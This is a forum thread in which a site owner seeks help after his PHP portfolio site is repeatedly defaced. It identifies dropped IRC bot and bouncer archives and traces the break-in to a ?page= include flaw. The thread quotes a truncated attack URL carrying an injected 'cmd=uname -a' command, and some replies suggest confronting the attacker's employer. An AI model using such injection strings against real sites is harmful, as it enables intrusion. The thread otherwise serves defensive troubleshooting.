My Site has been HACKED!

[richkoi]

My personal portfolio site (http://www.richknitter.com) has been hacked. I will leave the hacked page up until tomorrow afternoon. Until that time I would like someone to help me find out who this hacker is and how I can prosecute.

Thank you,

Rich

[nerdbyte]

Well, that's like trying to find a needle in a haystack. Unless you're some big company with big financial losses, normally the government doesn't care about small cases like defacing, etc.

I'd hire someone to beef up your security. My guess is that they got through one of your forms. Check site stats, google the information the hacker left laying around on your webpage, look at the whois on the domain name in the email address he left, report to their ISP. Basically all you can do.

Unless of course you have the funds and time to track this person down, then go for it.

[nullvariable]

"Sorry I hack you"? The guy doesn't speak English very well. He's likely not from a country where they would deport him or allow prosecution. Just make sure you're running the newest versions of any software on your site and patches for the OS and server software. It's likely that you were not targeted for it, but that you're site came up on a scan for a particular vulnerability. Probably an initiation into the IRC group that is mentioned on the page or just plain bragging rights for them. I understand the frustration but don't waste your time/money on it unless you're very well off because its likely that nothing will come of it.

NV

[ADAM Web Design]

Well...the good news is that the individual in question dropped you a clue. The bad news is that it's not all that much of a clue.

nullvariable is correct. It appears that whoever decided to do this to you runs an IRC (Internet Relay Chat, for the uninitiated) channel called #carderx , on a network called DALnet.

Now...for them to even know about your site, it usually means that you use IRC and somehow pissed off the wrong people. And they decided to act on it. One thing about IRC is that one does run into the odd script kiddie/hacker/phreaker/general all-around net scum. And quite often, these guys are very, very good at what they do.

Mind you, they usually try the DDoS route first. This is a little unusual, by IRC hacker standards.

Having said all of that, here's what I'd do:

• Change all admin/FTP logins and passwords first and foremost.
• Get your host to move the site onto a different server, or at the very least get a different IP address for it.
• As nullvariable said, make sure the server is up-to-date/patched/etc.
• Log EVERYTHING you can. FTP, raw logs, everything. Sometimes, you'll get something you can track.

Mind you, as nullvariable pointed out, "Sorry I Hack You" is broken English at best, and likely means you're dealing with someone from a country where prosecution of this sort of thing is...well...not high.

[richkoi]

hmmm...

Thanks for the tips. I don't use IRC and am pretty sure this is random.

I just want to know how they did it now so I can protect myself. If anyone can see a vulnerability please e-mail me and let me know.

Thanks,

Rich

[richkoi]

There are some new files on my server I just found:

ps.tar.gz
psybnc.tar
kinabot.tar.bz2

Any idea what these are?

Rich

[MuNKyonline]

ps.tar.gz = PostScript, tarred and gzipped

psybnc.tar = A bnc is short for a 'bouncer.' A bnc acts as a proxy for irc, allowing you to hide your real IP address and use a vhost psyBNC is an irc tool who can be installed on a shell.

kinabot.tar.bz2 makes it look like it may have something to do with these guys:

http://users.cjb.net/kasuscomp/index.html

[ADAM Web Design]

I don't think you'll ever find out. That's the problem.

The best thing you can do is not worry about the "how did they do it?" question, but "what are the security measures I can take to prevent this and any other problems?"

Have you talked to GoDaddy about it, since I believe it's them that hosted your site? They should deal with it. If not, move to a different host.

I actually had this happen to a client's site about 5 years ago when they were still hosted on (blech!) Interland. Interland installed something called "Hosting Controller" that had a known vulnerability. When I was able to isolate the hack attempt to this particular vulnerability and they refused to fix it, my client had no choice but to move their files to a different host. That may ultimately be your solution.

[richkoi]

I contacted GoDaddy... No response yet. I hope they deal with this or I will move hosts.

Thanks for the advice,

p.s. Munkey, thanks for the leads on those files.

Rich

[nullvariable]

Quote:

Originally Posted by richkoi

There are some new files on my server I just found:

ps.tar.gz
psybnc.tar
kinabot.tar.bz2

Any idea what these are?

Rich

They are IRC related. They were likely using your server as a relay point to launch DDOS attacks, load bots into channels or mask their IP address. You will most definitely want to change your IP address! You could see residual attacks against that IP for quite awhile. IP's with stuff like that get stuck in lists that get passed around for quite sometime. Trust me you don't want to be anywhere near that server if you can avoid it!

You may wonder how I know this :) Lets just say a few years ago I was on the other side of the ball :) But since then I grew up :D (well mostly) I still hang out on IRC some so I am familiar with some of the stuff that goes on there.

You'll also want to check for any illegal files as many times hacked servers are used to serve movies and such through IRC. Take a quick look at the processes running on the system if you have shell access (ps -A) and also run a netstat -tpa. That will let you see what ports are open and what programs are listening or connecting to them. These are Linux commands BTW try http://sysinternals.com/ for a good site to find utilities for windows information. This utility will provide the same information on Windows: http://www.sysinternals.com/Utilities/TcpView.html

Look for programs that are connecting to ports 6667,6668,6669,7000 as that's where IRC servers are located normally.

If your host is any good they can do the above checks for you :)

Hope this helps,

NV

[richkoi]

No word from GoDaddy yet. It's been 48 hours. I changed my passwords and CHMODed the FTP folders (what's standard? I just set the ADMIN to full permission and the guests and users to read/execute)

I moved the hacked site here:

http://www.richknitter.com/HACKED/

Rich

[richkoi]

Hacked again... same guy.

GoDaddy is not being very helpful.

I did get one piece of information that I would like help on. Apparently there is a flaw in my PHP coding that is letting the hacker through. I am brand new at PHP and would like to know if anyone sees a flaw in the way I have coded it. I can send you any PHP file you need, just let me know.

Thank you,

Rich

[MuNKyonline]

I dont see how that is possible. The only way I think that could happen is through a form but then that would also mean that GoDaddy doesnt have the necessary security installed to prevent intrusion. I would recommend moving to better hosting.

[ADAM Web Design]

I don't see it either, although I don't know PHP.

Does GoDaddy have any third-party programs or scripts installed? That's usually how they get in.

[richkoi]

The hackers slipped up and forgot to block their ip. I won't post it here but I will post the refering link:

http://www.richknitter.com/index.php...cmd=uname%20-a

They seem to be injecting their code by taking advantage of my ?page= variable. Anyone who knows PHP know of a way to keep them from doing this?

Thanks,

Rich

[richkoi]

It is my ?page= variable that was allowing them in.

I guess I'll have to change that so no remote sites can be plugged into that variable.

Rich

[nerdbyte]

If you send me your code, I can test it out for you on my machine. I suspect they are using javascript to manipulate where the form is submiting to and how it submits, or they are using the form itself.

nerdbyte

[richkoi]

I shut down the site, collected IP addresses (all the hackers are from Indochina) and am pursuing my legal options. I found out where one of the guys works, so I may be able to get in contact with his boss and let him know what his employee has been up to during the work day (that is assuming that the boss knows English).

I am fixing my code so hackers can not inject code into my site any longer.

Thanks for everyones help,

Rich

[ADAM Web Design]

Good luck, richkoi.

Indochina is one of those areas (pretty much all of Southeast Asia is) where stuff like this is pretty common and not often enforced. :(

[richkoi]

MOD: Please remove the links I posted in this topic.

Thank you,

Rich

[ccole1968]

You can try and stick it to them however you possibly can.

If you have a website from them, contact their webhost AND domain registrar and have them deleted/banned.

If you have their originating IP, contact their ISP and have their account terminated.
***This includes his boss' ISP - That is guaranteed to get his boss pissed at him if a direct call to his boss doesn't.

Informing the webhost, domain registrar, and ISP have been very effective (and FREE) for me in the past. Just be sure to include your access logs for proof and something is usually done about it.

Chris